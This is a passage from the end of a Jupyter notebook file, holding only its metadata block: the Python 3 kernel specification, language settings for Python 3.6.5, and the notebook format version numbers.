"metadata": { "kernelspec": { "display_name": "Python 3", "language": "python", "name": "python3" }, 
"language_info": { "codemirror_mode": { "name": "ipython", "version": 3 }, "file_extension": ".py", "mimetype": "text/x-python", "name": "python", "nbconvert_exporter": "python", "pygments_lexer": "ipython3", "version": "3.6.5" } }, "nbformat": 4, "nbformat_minor": 2 }